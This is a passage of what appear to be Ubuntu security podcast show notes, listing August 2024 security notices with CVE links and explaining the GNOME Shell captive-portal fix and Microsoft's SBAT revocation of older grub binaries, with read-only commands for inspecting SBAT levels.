<li><a href="https://ubuntu.com/security/CVE-2024-36939">CVE-2024-36939</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-38661">CVE-2024-38661</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-39488">CVE-2024-39488</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-36883">CVE-2024-36883</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-38621">CVE-2024-38621</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-37353">CVE-2024-37353</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-38780">CVE-2024-38780</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-36964">CVE-2024-36964</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-38627">CVE-2024-38627</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-36971">CVE-2024-36971</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-38615">CVE-2024-38615</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-38559">CVE-2024-38559</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-31076">CVE-2024-31076</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26886">CVE-2024-26886</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-39493">CVE-2024-39493</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27398">CVE-2024-27398</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-36886">CVE-2024-36886</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-38633">CVE-2024-38633</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-36959">CVE-2024-36959</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-38634">CVE-2024-38634</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-38560">CVE-2024-38560</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-38558">CVE-2024-38558</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52585">CVE-2023-52585</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-37356">CVE-2024-37356</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35976">CVE-2024-35976</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-36919">CVE-2024-36919</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-36933">CVE-2024-36933</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-38596">CVE-2024-38596</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-39276">CVE-2024-39276</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27399">CVE-2024-27399</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-38600">CVE-2024-38600</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-38578">CVE-2024-38578</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-36934">CVE-2024-36934</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6961-1-busybox-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6961-1">USN-6961-1</a>] BusyBox vulnerabilities</h3>
<ul>
<li>4 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Noble (24.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-42365">CVE-2023-42365</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-42364">CVE-2023-42364</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-42363">CVE-2023-42363</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-48174">CVE-2022-48174</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6962-1-libreoffice-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-6962-1">USN-6962-1</a>] LibreOffice vulnerability</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Noble (24.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-6472">CVE-2024-6472</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6963-1-gnome-shell-vulnerability--01-03">[<a href="https://ubuntu.com/security/notices/USN-6963-1">USN-6963-1</a>] GNOME Shell vulnerability (01:03)</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Noble (24.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-36472">CVE-2024-36472</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Captive portal detection would spawn an embedded webkit browser automatically
to allow user to login etc</li>
<li>But the page the user gets directed to is controlled by the attacker and can
contain arbitrary javascript etc</li>
<li>Upstream bug report claimed could then get a reverse shell etc - not clear
this is the case since would still be constrained by the webkitgtk browser so would also need a sandbox escape etc.</li>
<li>This update then includes a change to both <strong>not</strong> automatically open the captive
portal page (instead it will show a notification and the user needs to click
that) BUT to also disable the use of the webkitgtk-based embedded browser and
instead use the users regular browser</li>
</ul>
<h3 id="usn-6909-3-bind-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6909-3">USN-6909-3</a>] Bind vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-1975">CVE-2024-1975</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-1737">CVE-2024-1737</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6964-1-orc-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-6964-1">USN-6964-1</a>] ORC vulnerability</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Noble (24.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-40897">CVE-2024-40897</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6837-2-rack-vulnerabilitie">[<a href="https://ubuntu.com/security/notices/USN-6837-2">USN-6837-2</a>] Rack vulnerabilitie</h3>
<ul>
<li>3 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-26146">CVE-2024-26146</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26141">CVE-2024-26141</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-25126">CVE-2024-25126</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6966-1-firefox-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6966-1">USN-6966-1</a>] Firefox vulnerabilities</h3>
<ul>
<li>13 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-7525">CVE-2024-7525</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-7522">CVE-2024-7522</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-7520">CVE-2024-7520</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-7519">CVE-2024-7519</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-7531">CVE-2024-7531</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-7530">CVE-2024-7530</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-7529">CVE-2024-7529</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-7528">CVE-2024-7528</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-7527">CVE-2024-7527</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-7526">CVE-2024-7526</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-7524">CVE-2024-7524</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-7521">CVE-2024-7521</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-7518">CVE-2024-7518</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6966-2-firefox-regressions">[<a href="https://ubuntu.com/security/notices/USN-6966-2">USN-6966-2</a>] Firefox regressions</h3>
<ul>
<li>13 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-7525">CVE-2024-7525</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-7522">CVE-2024-7522</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-7520">CVE-2024-7520</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-7519">CVE-2024-7519</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-7531">CVE-2024-7531</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-7530">CVE-2024-7530</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-7529">CVE-2024-7529</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-7528">CVE-2024-7528</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-7527">CVE-2024-7527</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-7526">CVE-2024-7526</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-7524">CVE-2024-7524</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-7521">CVE-2024-7521</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-7518">CVE-2024-7518</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6951-3-linux-kernel--azure--vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6951-3">USN-6951-3</a>] Linux kernel (Azure) vulnerabilities</h3>
<ul>
<li>83 CVEs addressed in Bionic ESM (18.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-48674">CVE-2022-48674</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-39471">CVE-2024-39471</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-39292">CVE-2024-39292</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-36270">CVE-2024-36270</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-36904">CVE-2024-36904</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-38618">CVE-2024-38618</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-36014">CVE-2024-36014</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-36941">CVE-2024-36941</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-38637">CVE-2024-38637</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-38613">CVE-2024-38613</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-36286">CVE-2024-36286</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-36902">CVE-2024-36902</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-38599">CVE-2024-38599</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-39301">CVE-2024-39301</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-39475">CVE-2024-39475</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-36954">CVE-2024-36954</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-33621">CVE-2024-33621</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-38552">CVE-2024-38552</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-36950">CVE-2024-36950</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-38582">CVE-2024-38582</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-36015">CVE-2024-36015</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52434">CVE-2023-52434</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-38659">CVE-2024-38659</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-36940">CVE-2024-36940</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-38607">CVE-2024-38607</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-39480">CVE-2024-39480</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-38583">CVE-2024-38583</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52882">CVE-2023-52882</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-39467">CVE-2024-39467</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-39489">CVE-2024-39489</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-38601">CVE-2024-38601</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27019">CVE-2024-27019</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52752">CVE-2023-52752</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-36960">CVE-2024-36960</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-38549">CVE-2024-38549</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-38567">CVE-2024-38567</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-38587">CVE-2024-38587</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-38635">CVE-2024-38635</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-38598">CVE-2024-38598</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-38612">CVE-2024-38612</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-38579">CVE-2024-38579</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27401">CVE-2024-27401</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-36946">CVE-2024-36946</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-36017">CVE-2024-36017</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-48772">CVE-2022-48772</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-36905">CVE-2024-36905</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35947">CVE-2024-35947</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-38381">CVE-2024-38381</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-38565">CVE-2024-38565</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-38589">CVE-2024-38589</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-36939">CVE-2024-36939</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-38661">CVE-2024-38661</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-39488">CVE-2024-39488</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-36883">CVE-2024-36883</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-38621">CVE-2024-38621</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-37353">CVE-2024-37353</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-38780">CVE-2024-38780</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-36964">CVE-2024-36964</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-38627">CVE-2024-38627</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-36971">CVE-2024-36971</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-38615">CVE-2024-38615</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-38559">CVE-2024-38559</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-31076">CVE-2024-31076</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26886">CVE-2024-26886</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-39493">CVE-2024-39493</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27398">CVE-2024-27398</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-36886">CVE-2024-36886</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-38633">CVE-2024-38633</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-36959">CVE-2024-36959</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-38634">CVE-2024-38634</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-38560">CVE-2024-38560</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-38558">CVE-2024-38558</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52585">CVE-2023-52585</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-37356">CVE-2024-37356</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-35976">CVE-2024-35976</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-36919">CVE-2024-36919</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-36933">CVE-2024-36933</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-38596">CVE-2024-38596</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-39276">CVE-2024-39276</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-27399">CVE-2024-27399</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-38600">CVE-2024-38600</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-38578">CVE-2024-38578</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-36934">CVE-2024-36934</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6968-1-postgresql-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-6968-1">USN-6968-1</a>] PostgreSQL vulnerability</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Noble (24.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-7348">CVE-2024-7348</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6967-1-intel-microcode-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6967-1">USN-6967-1</a>] Intel Microcode vulnerabilities</h3>
<ul>
<li>5 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Noble (24.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-25939">CVE-2024-25939</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-24980">CVE-2024-24980</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-24853">CVE-2024-24853</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-49141">CVE-2023-49141</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-42667">CVE-2023-42667</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="lsn-0106-1-linux-kernel-vulnerability">[<a href="https://ubuntu.com/security/notices/LSN-0106-1">LSN-0106-1</a>] Linux kernel vulnerability</h3>
<ul>
<li>3 CVEs addressed in
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-36016">CVE-2024-36016</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26585">CVE-2024-26585</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52620">CVE-2023-52620</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6969-1-cacti-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6969-1">USN-6969-1</a>] Cacti vulnerabilities</h3>
<ul>
<li>10 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Noble (24.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-34340">CVE-2024-34340</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-34360">CVE-2024-34360</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-31460">CVE-2024-31460</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-31459">CVE-2024-31459</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-31458">CVE-2024-31458</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-31445">CVE-2024-31445</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-31444">CVE-2024-31444</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-31443">CVE-2024-31443</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-29894">CVE-2024-29894</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-25641">CVE-2024-25641</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6970-1-exfatprogs-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-6970-1">USN-6970-1</a>] exfatprogs vulnerability</h3>
<ul>
<li>1 CVEs addressed in Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-45897">CVE-2023-45897</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6944-2-curl-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-6944-2">USN-6944-2</a>] curl vulnerability</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-7264">CVE-2024-7264</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6965-1-vim-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6965-1">USN-6965-1</a>] Vim vulnerabilities</h3>
<ul>
<li>5 CVEs addressed in Trusty ESM (14.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-4069">CVE-2021-4069</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-4019">CVE-2021-4019</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3984">CVE-2021-3984</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3974">CVE-2021-3974</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3973">CVE-2021-3973</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="reports-of-dual-boot-linux-windows-machines-failing-to-boot--04-30">Reports of dual-boot Linux/Windows machines failing to boot (04:30)</h3>
<ul>
<li><a href="https://arstechnica.com/security/2024/08/a-patch-microsoft-spent-2-years-preparing-is-making-a-mess-for-some-linux-users/">https://arstechnica.com/security/2024/08/a-patch-microsoft-spent-2-years-preparing-is-making-a-mess-for-some-linux-users/</a></li>
<li><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2022-2601">https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2022-2601</a></li>
<li><a href="https://discourse.ubuntu.com/t/sbat-self-check-failed-mitigating-the-impact-of-shim-15-7-revocation-on-the-ubuntu-boot-process-for-devices-running-windows/47378">https://discourse.ubuntu.com/t/sbat-self-check-failed-mitigating-the-impact-of-shim-15-7-revocation-on-the-ubuntu-boot-process-for-devices-running-windows/47378</a></li>
<li>Microsoft released an update for Windows on 13th August 2024 - revoking old
versions of grub that were susceptible to <a href="https://ubuntu.com/security/CVE-2022-2601">CVE-2022-2601</a></li>
<li>How do you revoke grub?
<ul>
<li>Secure Boot relies on each component in the boot chain verifying that the
next component is signed with a valid signature before it is then loaded
<ul>
<li>UEFI BIOS validates shim</li>
<li>shim validates grub</li>
<li>grub validates kernel</li>
<li>kernel validates kernel modules etc</li>
</ul>
</li>
<li>UEFI specification has effectively a CRL - list of hashes of binaries which
shouldn&rsquo;t be trusted</li>
<li>BUT there is only limited space in the UEFI storage - after the original
BootHole vulnerabilities revoked a huge number of grub binaries from many
different distros, some devices failed to boot as the NVRAM was too full</li>
<li>Microsoft and Red Hat and other maintainers of shim decided on a new scheme,
called SBAT - Secure Boot Advanced Targeting
<ul>
<li>maintains a generation number for each component in the boot chain</li>
<li>when say shim or grub gets updated to fix a bunch more security
vulnerabilities, upstream bumps the generation number</li>
<li>shim/grub then embeds the generation number within itself</li>
<li>Signed UEFI variable then lists which generation numbers are acceptable</li>
</ul>
</li>
<li>shim checks the generation number of a binary (grub/fwupd etc) against this
list and if it is too old refuses to load it</li>
</ul>
</li>
<li>In Ubuntu this was patched back in <a href="https://bugs.launchpad.net/ubuntu/+source/grub2-unsigned/+bug/1996950">Jan 2023</a> and was documented on the <a href="https://discourse.ubuntu.com/t/sbat-revocations-boot-process/34996">Ubuntu
Discourse</a> - in this case we updated shim to a newer version which itself
revoked an older grub, <code>grub,1</code></li>
<li>Now Microsoft&rsquo;s update revokes <code>grub,2</code>, ie sets the minimum generation number
for grub to <code>3</code></li>
<li>You can inspect the SBAT policy by either directly reading the associated EFI
variable or using <code>mokutil --list-sbat-revocations</code></li>
</ul>
<!-- raw HTML omitted -->
<pre tabindex="0"><code class="language-nil" data-lang="nil">cat /sys/firmware/efi/efivars/SbatLevelRT-605dab50-e046-4300-abb6-3dd810dd8b23
mokutil --list-sbat-revocations
</code></pre><div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-text" data-lang="text"><span style="display:flex;"><span>sbat,1,2023012900
</span></span><span style="display:flex;"><span>shim,2
</span></span><span style="display:flex;"><span>grub,3
</span></span><span style="display:flex;"><span>grub.debian,4
</span></span></code></pre></div><div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>objdump -j .sbat -s /boot/efi/EFI/ubuntu/grubx64.efi | xxd -r
</span></span></code></pre></div><div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-text" data-lang="text"><span style="display:flex;"><span>sbat,1,SBAT Version,sbat,1,https://github.com/rhboot/shim/blob/main/SBAT.md
</span></span><span style="display:flex;"><span>grub,4,Free Software Foundation,grub,2.12,https://www.gnu.org/software/grub/
